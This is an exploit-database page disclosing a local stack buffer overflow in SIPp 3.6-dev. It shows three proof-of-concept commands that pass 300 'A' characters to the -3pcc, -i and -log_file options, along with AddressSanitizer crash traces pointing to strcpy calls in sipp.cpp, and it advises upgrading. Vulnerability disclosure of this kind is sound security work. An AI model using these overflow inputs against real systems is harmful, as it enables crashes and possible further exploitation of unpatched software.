header-logo
Suggest Exploit
vendor:
SIPp
by:
Fakhri Zulkifli
7.8
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: SIPp
Affected Version From: 3.6-dev
Affected Version To: 3.6-dev
Patch Exists: YES
Related CWE: N/A
CPE: a:sipp:sipp
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: 3.6-dev
2018

SIPp 3.6 – Local Buffer Overflow (PoC)

A buffer overflow vulnerability exists in SIPp 3.6-dev and earlier versions. By passing a large string of “A” characters as an argument to the -3pcc, -i, and -log_file options, a local attacker can cause a stack-based buffer overflow, resulting in a crash.

Mitigation:

Upgrade to the latest version of SIPp.
Source

Exploit-DB raw data:

# Exploit Title: SIPp 3.6 - Local Buffer Overflow (PoC)
# Date: 2018-06-30
# Exploit Author: Fakhri Zulkifli
# Vendor Homepage: http://sipp.sourceforge.net/ 
# Software Link: https://github.com/SIPp/sipp/releases 
# Version: 3.6-dev and earlier
# Tested on: 3.6-dev

$ ./sipp -3pcc `python -c ‘print “A” * 300'`

#0 0x448364 in strcpy /home/user/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:425
#1 0x668d06 in main /home/user/sipp/src/sipp.cpp:1531:17
#2 0x7ff5ec21282f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#3 0x41f1a8 in _start (/home/user/sipp/sipp+0x41f1a8)

$ ./sipp -i `python -c ‘print “A” * 300'`

#0 0x448364 in strcpy /home/user/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:425
#1 0x66a303 in main /home/user/sipp/src/sipp.cpp:1477:17
#2 0x7f281302682f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#3 0x41f1a8 in _start (/home/user/sipp/sipp+0x41f1a8)

$ ./sipp -log_file `python -c ‘print “A” * 300'`

#0 0x448364 in strcpy /home/user/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:425
#1 0x66912f in main /home/user/sipp/src/sipp.cpp:1706:17
#2 0x7f6ca663782f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#3 0x41f1a8 in _start (/home/user/sipp/sipp+0x41f1a8)

Navigation

Suggest Exploit

Services By CQR